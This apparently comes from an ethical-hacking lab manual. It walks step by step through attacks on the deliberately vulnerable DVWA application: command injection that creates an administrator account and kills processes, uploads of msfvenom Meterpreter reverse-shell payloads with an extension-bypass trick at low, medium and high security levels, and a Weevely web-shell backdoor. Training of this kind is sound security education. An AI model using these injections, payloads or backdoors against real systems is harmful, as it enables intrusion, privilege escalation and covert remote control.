In this task, we will perform command-line execution on a vulnerability found in DVWA. Here, you will learn how to extract information about a target machine, create a user account, assign administrative privileges to the created account, and use that account to log in to the target machine.

1. Click Windows 10 to switch to the Windows 10 machine.

2. Launch any browser, in this lab we are using Mozilla Firefox. In the address bar of the browser place your mouse cursor and click http://10.10.10.16:8080/dvwa/login.php and press Enter

   The IP address of the Windows Server 2016 in this lab is 10.10.10.16, which might vary in your lab environment.

3. The DVWA login page appears; type the Username and Password as gordonb and abc123. Click the Login button.

   If a Would you like Firefox to save this login notification appears at the top of the browser window, click Don’t Save.

   

4. You are successfully logged in, and the DVWA main webpage appears. Click Command Injection from the options available in the left pane.

   

5. The Vulnerability: Command Injection page appears; under the Ping a device section, type the IP address of the Windows Server 2016 machine (here, 10.10.10.16) into the Enter an IP address field and click the Submit button to ping the machine.

   The command injection utility in DVWA allows you to ping the target machine.

   

6. DVWA successfully pings the target machine, as shown in the screenshot.

   

7. Now, try to issue a different command to check whether DVWA can execute it.

8. Type | hostname into the Enter an IP address field and click Submit. This command is used to probe the hostname of the target machine.

   

9. As you have issued a command instead of entering the IP address of a machine, the application returns an error, as shown in the screenshot.

   

10. The result indicates that the DVWA application is secure.

11. Now, check the security setting of the web application. To do so, click DVWA Security in the left pane.

12. The DVWA Security page appears. Observe that the security level is Impossible. This security setting was blocking you from executing commands other than simply pinging a machine.

13. Now, to exploit the command execution vulnerability, set the Security Level of the web application to low by selecting the option Low from the drop-down list and click Submit.

    Here, your intention would be to show that a weakly secured web application is the prime focus of attackers, who seek to exploit its vulnerabilities.

    

14. You have configured a weak security setting in DVWA. Now, try to execute a command other than ping.

15. Click Command Injection from the left-pane.

16. The Vulnerability: Command Injection page appears; type | hostname into the Enter an IP address field, and click Submit.

17. DVWA returns the name of the Windows Server 2016 machine, as shown in the screenshot.

    

18. This infers that the command execution field is vulnerable and that you can remotely execute commands.

19. Now, extract more information regarding the target machine, Windows Server 2016.

20. Type the command | whoami and click Submit.

    

21. The application displays the user, group, and privileges information for the user currently logged onto the Windows Server 2016 machine, as shown in the screenshot.

    

22. Now, type | tasklist, and click Submit to view the processes running on the machine.

    

23. A list of all the running processes on the Windows Server 2016 machine is displayed, as shown in the screenshot.

    

24. To check if you can terminate a process, choose any process from the list (here, Microsoft.ActiveDirectory), and note down its process PID (here, 2172).

    The list of running processes might differ in your lab environment.

    

25. Type | Taskkill /PID [Process ID value of the desired process] /F (here, PID is 2172) and click Submit. By issuing this command, you are forcefully (/F) terminating the process.

    

26. The process will be successfully terminated, as shown in the screenshot.

    To confirm that the process has successfully been terminated, you can issue the | tasklist command again to check the running processes.

    

27. Now, to view the directory structure of the Windows Server 2016 machine, type | dir C:\ and click Submit to view the files and directories on the C:\ drive.

    

28. The directory structure of the C drive of the target server (Windows Server 2016) is displayed, as shown in the screenshot.

    

29. In the same way, you can issue commands to view other directories.

30. Now, try to obtain information related to user accounts.

31. To view user account information, type | net user, and click Submit.

    

32. DVWA obtains user account information from the Windows Server 2016 machine and lists, as shown in the screenshot.

    

33. Now, use the command execution vulnerability and attempt to add a user account remotely.

34. Create an account named Test. To do so, type | net user Test /Add and click Submit.

    

35. The command completed successfully notification appears and a user account named Test is created.

    

36. To view the new user account, type the command | net user and click Submit.

37. You can observe the newly created account Test, as shown in the screenshot.

    

38. Now, view the new account’s information. Type | net user Test and click Submit.

    

39. The Test account information appears. You can see that Test is a standard user account and does not have administrative privileges. You can see that it has an entry called Local Group Memberships.

    

40. Now, assign administrative privileges to the account. The reason for granting administrative privileges to this account is to use this (admin) account to log into the Windows Server 2016 machine with administrator access using a remote desktop connection.

41. To grant administrative privileges, type | net localgroup Administrators Test /Add and click Submit.

    

42. You have successfully granted admin privileges to the account. Confirm the new setting by issuing the command | net user Test. Test is now an administrator account under the Local Group Memberships option.

    

43. Now, log into the Windows Server 2016 machine using the Test account through Remote Desktop Connection.

44. Click the Type here to search field from the bottom of Desktop and type Remote. Click Remote Desktop Connection from the results.

45. The Remote Desktop Connection window appears. In the Computer field, type the target system IP address (here, 10.10.10.16 [Windows Server 2016]) and click Show Options.

    

46. The Remote Desktop Connection window appears with the General tab displayed; enter the User name as test and click Connect.

    

47. A Windows Security pop-up appears; leave the Password field empty and click OK.

    

48. A Remote Desktop Connection window appears; click Yes.

    

49. A remote desktop connection is successfully established, as shown in the screenshot.

    Thus, you have made use of a command execution vulnerability in a DVWA application hosted by the Windows Server 2016 machine, extracted information related to the machine, remotely created an administrator account, and logged into it.

    

50. Now, you may discontinue the session and log out of the web application. To do so, close the Remote Desktop Connection window. If a Your remote session will be disconnected notification appears, click OK.

51. This concludes the demonstration of how to exploit a remote command execution vulnerability to compromise a target web server.

52. Close all open windows and document all the acquired information.

---

Task 7: Exploit a File Upload Vulnerability at Different Security Levels

Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. It is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. It contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. Meterpreter is a Metasploit attack payload that provides an interactive shell that can be used to explore the target machine and execute code.

Here, we will use exploit a file upload vulnerability at different security levels of DVWA using Metasploit.

Before starting this task, ensure that the WampServer is running on the Windows Server 2016 machine.

1. Click Parrot Security to switch to the Parrot Security machine.

2. Click the MATE Terminal icon at the top of Desktop to open a Terminal window.

   

3. A Parrot Terminal window appears. In the terminal window, type sudo su and press Enter to run the programs as a root user.

4. In the [sudo] password for attacker field, type toor as a password and press Enter.

   The password that you type will not be visible.

5. Now, type cd and press Enter to jump to the root directory.

   

6. In the Terminal window appears; type msfvenom -p php/meterpreter/reverse_tcp LHOST=[IP Address of Host Machine] LPORT=4444 -f raw and press Enter.

   Here, the IP address of the host machine is 10.10.10.13 (the Parrot Security machine).

7. The raw payload is generated in the terminal window. Select the payload, right-click on it, and click Copy from the context menu to copy the payload, as shown in the screenshot.

   

8. Now, in the terminal window, type cd /home/attacker/Desktop/ and press Enter to navigate to the Desktop.

9. Type pluma upload.php and press Enter to launch the Pluma text editor.

   

10. The Pluma text editor window appears; press Ctrl+V to paste the raw payload copied in Step 7, and then press Ctrl+S to save the context.

    

11. Close all the open windows.

12. Click the Firefox icon from the top section of Desktop, type http://10.10.10.16:8080/dvwa/login.php. Into the address bar and press Enter.

13. The DVWA login page appears; enter the Username and Password as admin and password. Click the Login button.

    If a Would you like Firefox to save this login notification appears at the top of the browser window, click Don’t Save.

    

14. The Welcome to Damn Vulnerable Web Application! Page appears. Click DVWA Security in the left pane to view the DVWA security level.

15. Change the security level from impossible to low by selecting Low from the drop-down list and clicking the Submit button, as shown in the screenshot.

    

16. Click the File Upload option from the left pane.

17. The Vulnerability: File Upload page appears; click the Browse… button to upload a file.

    

18. When the File Upload window appears, navigate to the Desktop location, select the payload file upload.php, and click Open.

    

19. Observe that the selected file (upload.php) appears to the right of Browse… button.

20. Now, click the Upload button to upload the file to the database.

    

21. You will see a message saying that the file has been uploaded successfully, with the location of the file. Note the location of the file and minimize the browser window.

    

22. Launch a Terminal window by clicking on the MATE Terminal icon at the top of Desktop.

23. In the terminal window, type sudo su and press Enter to run the programs as a root user.

24. In the [sudo] password for attacker field, type toor as a password and press Enter.

    The password that you type will not be visible.

25. Now, type cd and press Enter to jump to the root directory.

    

26. In the Terminal window, type msfconsole and press Enter to launch the Metasploit framework.

27. In msfconsole, type use exploit/multi/handler and press Enter to set up the listener.

    

28. Now, set the payload, LHOST, and LPORT. To do so, use the below commands:

    • Type set payload php/meterpreter/reverse_tcp and press Enter
    • Type set LHOST 10.10.10.13 and press Enter
    • Type set LPORT 4444 and press Enter
    • Type run and press Enter to start the listener

29. Observe that the listener is up and running at 10.10.10.13. Minimize the terminal window.

    

30. Switch back to the Mozilla Firefox window where the DVWA website is open. Open a new tab, type http://10.10.10.16:8080/dvwa/hackable/uploads/upload.php in the address bar, and press Enter to execute the uploaded payload.

    

31. Switch back to the Terminal window and observe that a Meterpreter session has successfully been established with the victim system, as shown in the screenshot.

    

32. In the meterpreter command line, type sysinfo and press Enter to view the system details of the victim machine.

    

33. Close all open windows.

34. Launch a new Terminal window by clicking on the MATE Terminal icon at the top of Desktop window.

35. In the terminal window, type sudo su and press Enter to run the programs as a root user.

36. In the [sudo] password for attacker field, type toor as a password and press Enter.

    The password that you type will not be visible.

37. Now, type cd and press Enter to jump to the root directory.

    

38. In the Terminal window, type msfvenom -p php/meterpreter/reverse_tcp LHOST=[IP Address of Host Machine] LPORT=3333 -f raw and press Enter.

    Here, the IP address of the host machine is 10.10.10.13 (Parrot Security machine).

39. The raw payload is generated in the terminal window. Select the payload, right-click on it, and click Copy from the context menu to copy the payload, as shown in the screenshot.

    

40. Now, in the terminal window, type cd /home/attacker/Desktop/ and press Enter to navigate to the Desktop.

41. Type pluma medium.php.jpg and press Enter to launch the Pluma text editor.

    

42. The Pluma text editor window appears; press Ctrl+V to paste the raw payload copied in Step 39, and then press Ctrl+S to save the context.

    

43. Click the Firefox icon from the top section of Desktop, type http://10.10.10.16:8080/dvwa/login.php. Into the address bar, and press Enter. The DVWA login page appears; log in with the credentials admin and password, and click the Login button.

    If a Would you like Firefox to save this login notification appears at the top of the browser window, click Don’t Save.

44. The Welcome to Damn Vulnerable Web Application! Page appears. Click DVWA Security from the left pane to view the DVWA security level.

45. Change the Security Level from impossible to medium by selecting Medium from the drop-down list and clicking the Submit button, as shown in the screenshot.

    

46. Click the File Upload option in the left pane.

47. The Vulnerability: File Upload page appears; click the Browse… button to upload a file.

    

48. The File Upload window appears. Navigate to the Desktop location and select the payload file medium.php.jpg and click Open.

    

49. Observe that the selected file (medium.php.jpg) appears to the right of the Browse… button.

50. Now, before uploading the file, set up a Burp Suite proxy. Start by configuring the proxy settings of the browser.

51. Click the Open Menu icon in the right corner of the menu bar and select Preferences from the list.

    

52. The General settings tab appears. In the Find in Preferences search bar, type proxy, and press Enter.

53. The Search Results appear; click the Settings button under the Network Settings option.

    

54. A Connection Settings window appears; select the Manual proxy configuration radio button and ensure that the HTTP Proxy is set to 127.0.0.1 and Port as 8080. Ensure that the Use this proxy server for all protocols checkbox is selected and click OK. Close the Preferences tab.

    

55. Now, minimize the browser window, click Applications from the top left corner of Desktop and navigate to Pentesting --> Web Application Analysis --> Web Application Proxies --> burpsuite to launch the Burp Suite application.

    

56. A security pop-up appears, enter the password as toor in the Password field and click OK.

    

57. In the next Burp Suite Community Edition notification, click OK.

    

58. A notification appears saying that An update is available, click Close.

59. The Burp Suite main window appears. Ensure that the Temporary project radio button is selected and click the Next button, as shown in the screenshot.

    

60. In the next window, select the Use Burp defaults radio-button and click the Start Burp button.

    

61. The Burp Suite main window appears; click the Proxy tab from the available options in the top section of the window.

    

62. In the Proxy settings, by default, the Intercept tab opens-up. Observe that the interception is active by default, as the button says Intercept is on. Leave it running.

    Turn the interception on if it is set to off.

    

63. Switch back to the browser window and click the Upload button under the Vulnerability: File Upload section to upload the payload file.

    

64. Switch back to the Burp Suite window. Observe that the request has been captured and displayed in the raw format under the Raw tab. In the filename field, you will see the name of the file to be uploaded as medium.php.jpg.

    

65. Change the filename to medium.php and click the Forward button to forward the request.

    

66. Now, turn the interception off by clicking on the Intercept is on button. The button now says Intercept is off, as shown in the screenshot. Close the window.

    If a Confirm pop-up appears, click Yes.

    

67. Switch back to the browser window. Observe a message saying that the file has been uploaded successfully, along with the upload location of the file. Note down this location.

    

68. Remove the browser proxy set up in Step 54 by selecting the No proxy radio-button in the Connection Settings window and clicking OK. Close the tab.

    

69. Launch a Terminal window by clicking on the MATE Terminal icon at the top of Desktop.

70. In the terminal window, type sudo su and press Enter to run the programs as a root user.

71. In the [sudo] password for attacker field, type toor as a password and press Enter.

    The password that you type will not be visible.

72. Now, type cd and press Enter to jump to the root directory.

    

73. In the Terminal window, type msfconsole and press Enter to launch the Metasploit framework.

74. In msfconsole, type use exploit/multi/handler and press Enter to begin setting up the listener.

75. You have to set up a listener so that you can establish a Meterpreter session with your victim. Follow the steps given below to set up a listener using the msf command line:

    • Type set payload php/meterpreter/reverse_tcp and press Enter
    • Type set LHOST 10.10.10.13 and press Enter
    • Type set LPORT 3333 and press Enter.
    • Type run and press Enter to start the listener

    

76. Switch to the Mozilla Firefox window where the DVWA website is open. Open a new tab, type http://10.10.10.16:8080/dvwa/hackable/uploads/medium.php into the address bar and press Enter to execute the uploaded payload.

    

77. Switch back to the Terminal window and observe that a Meterpreter session has successfully been established with the victim system.

    

78. In the meterpreter command line, type sysinfo and press Enter to view the system details of the victim machine.

    

79. Close all open windows.

80. Launch a Terminal window by clicking on the MATE Terminal icon at the top of Desktop.

81. In the terminal window, type sudo su and press Enter to run the programs as a root user.

82. In the [sudo] password for attacker field, type toor as a password and press Enter.

    The password that you type will not be visible.

83. Now, type cd and press Enter to jump to the root directory.

    

84. In the Terminal window, type msfvenom -p php/meterpreter/reverse_tcp LHOST=[IP Address of Host Machine] LPORT=2222 -f raw and press Enter.

    Here, the IP address of the host machine is 10.10.10.13 (Parrot Security machine).

85. The raw payload is generated in the terminal window. Select the payload, right-click on it, and click Copy from the context menu to copy the payload, as shown in the screenshot.

    

86. Now, in the terminal window, type cd /home/attacker/Desktop/ and press Enter to navigate to the Desktop.

87. Type pluma high.jpeg and press Enter to launch the Pluma text editor.

    

88. The Pluma text editor window appears; press Ctrl+V to paste the raw payload copied in Step 85. Edit the payload file by adding GIF98 to the first line and then press Ctrl+S to save the context.

    

89. Close all open windows.

90. Click the Firefox icon from the top section of Desktop, type http://10.10.10.16:8080/dvwa/login.php into the address bar and press Enter. The DVWA login page appears. Log in with the credentials admin and password, and click the Login button.

    If a Would you like Firefox to save this login notification appears at the top of the browser window, click Don’t Save.

91. The Welcome to Damn Vulnerable Web Application! Page appears; click DVWA Security in the left pane to view the DVWA security level.

92. Change the Security Level from impossible to high by selecting High from the drop-down list and clicking the Submit button, as shown in the screenshot.

    

93. Click the File Upload option in the left pane. The Vulnerability: File Upload page appears. Click the Browse… button to upload a file.

    

94. The File Upload window appears. Navigate to the Desktop location, select the payload file high.jpeg, and click Open.

    

95. Observe that the selected file (high.jpeg) appears to the right of the Browse… button.

96. Now, click the Upload button to upload the file to the database.

    

97. You will see a message saying that the file has been uploaded successfully, along with the location of the uploaded file. Note down this location.

    

98. Now, click the Command Injection option in the left pane. The Vulnerability: Command Injection window appears; in the Enter an IP address field, type |copy C:\wamp64\www\DVWA\hackable\uploads\high.jpeg C:\wamp64\www\DVWA\hackable\uploads\shell.php and click the Submit button.

    

99. Observe a message saying that the file has been copied, as shown in the screenshot.

    

100. Launch a Terminal window by clicking on the MATE Terminal icon at the top of Desktop.

101. A Parrot Terminal window appears. In the terminal window, type sudo su and press Enter to run the programs as a root user.

102. In the [sudo] password for attacker field, type toor as a password and press Enter.

     The password that you type will not be visible.

103. Now, type cd and press Enter to jump to the root directory.

     

104. In the Terminal window, type msfconsole and press Enter to launch the Metasploit framework.

105. In msfconsole, type use exploit/multi/handler and press Enter to begin setting up the listener.

106. You have to set up a listener so that you can establish a Meterpreter session with your victim. Follow the steps given below to set up a listener using the msf command line:

     • Type set payload php/meterpreter/reverse_tcp and press Enter
     • Type set LHOST 10.10.10.13 and press Enter
     • Type set LPORT 2222 and press Enter.
     • Type run and press Enter to start the listener

     

107. Switch to the Mozilla Firefox window where the DVWA website is open. Open a new tab, type http://10.10.10.16:8080/dvwa/hackable/uploads/shell.php into the address bar and press Enter to execute the uploaded payload.

     

108. Switch back to the Terminal window and observe that a Meterpreter session has successfully been established with the victim system.

     

109. In the meterpreter command line, type sysinfo and press Enter to view the system details of the victim machine.

     

110. This concludes the demonstration of how to exploit a file upload vulnerability at different security levels.

111. Close all open windows and document all the acquired information.

---

Task 8: Gain Backdoor Access via a Web Shell using Weevely

Gaining backdoor access refers to entering a website in a stealthy way. These Backdoors are often installed via some unvalidated uploads. This vulnerability allows you to upload harmful files to the target web server. Websites that are developed using PHP are often susceptible to this kind of attack.

A professional ethical hacker or pen tester can use tools such as Weevely to gain backdoor access to a website without being traced. Weevely is used to develop a backdoor shell and upload it to a target server in order to gain remote shell access. This tool also helps in performing administrative tasks, maintaining persistence, and spreading backdoors across the target network.

Here, we will gain backdoor access via a web shell using Weevely.

1. On the Parrot Security machine, click the MATE Terminal icon at the top of Desktop to open a Terminal window.

   

2. A Parrot Terminal window appears. In the terminal window, type sudo su and press Enter to run the programs as a root user.

   If a Question pop-up window appears, asking for you to update the machine, click No to close the window.

3. In the [sudo] password for attacker field, type toor as a password and press Enter.

   The password that you type will not be visible.

4. Now, type cd and press Enter to jump to the root directory.

   

5. In the Terminal window; type weevely generate (Password) (File Path) (here, the password is toor, and the file path is /home/attacker/Desktop/shell.php) and press Enter to generate a shell file.

   Weevely encodes the payload with a key phrase so that no one else can use it to access the target system.

6. The shell file (shell.php) is generated at the location /home/attacker/Desktop, and it is encoded with the password (toor). Minimize the terminal window.

   

7. Click the Firefox icon from the top section of Desktop, type http://10.10.10.16:8080/dvwa/login.php. Into the address bar and press Enter.

8. The DVWA login page appears; enter the Username and Password as admin and password. Click the Login button.

   If a Would you like Firefox to save this login notification appears at the top of the browser window, click Don’t Save.

   

9. The Welcome to Damn Vulnerable Web Application! Page appears. Click DVWA Security in the left pane to view the DVWA security level.

10. Change the Security Level from impossible to low by selecting Low from the drop-down list and clicking the Submit button, as shown in the screenshot.

    

11. Click the File Upload option from the left pane.

12. The Vulnerability: File Upload page appears. Click the Browse… button to upload a file.

    

13. The File Upload window appears; navigate to the Desktop location, select the payload file shell.php, and click Open.

    

14. Observe that the selected file (shell.php) appears to the right of the Browse… button.

15. Now, click the Upload button to upload the file to the database.

    

16. You will see a message that the file has successfully been uploaded, with the location of the file. Note the location of the file and minimize the browser window.

    

17. Switch back to the Terminal window, type weevely http://10.10.10.16:8080/dvwa/hackable/uploads/shell.php [Password] (The password that you have provided in Step#2), and press Enter. This command establishes a connection with the payload and interacts with the target.

    Here, the password is toor.

18. You can observe that a session has successfully been established with the victim system.

    

19. Now, type whoami and press Enter to view the system details of the victim machine.

20. The result appears, displaying the running system privileges and the present working directory, as shown in the screenshot.

    

21. Now, type ipconfig and press Enter to view the IP configuration of the victim machine.

22. The result appears, displaying the victim machine’s IP address, default gateway, Ipv6 address, and other information.

    

23. This concludes the demonstration of how to gain backdoor access via a web shell using Weevely.

24. Close all open windows and document all the acquired information.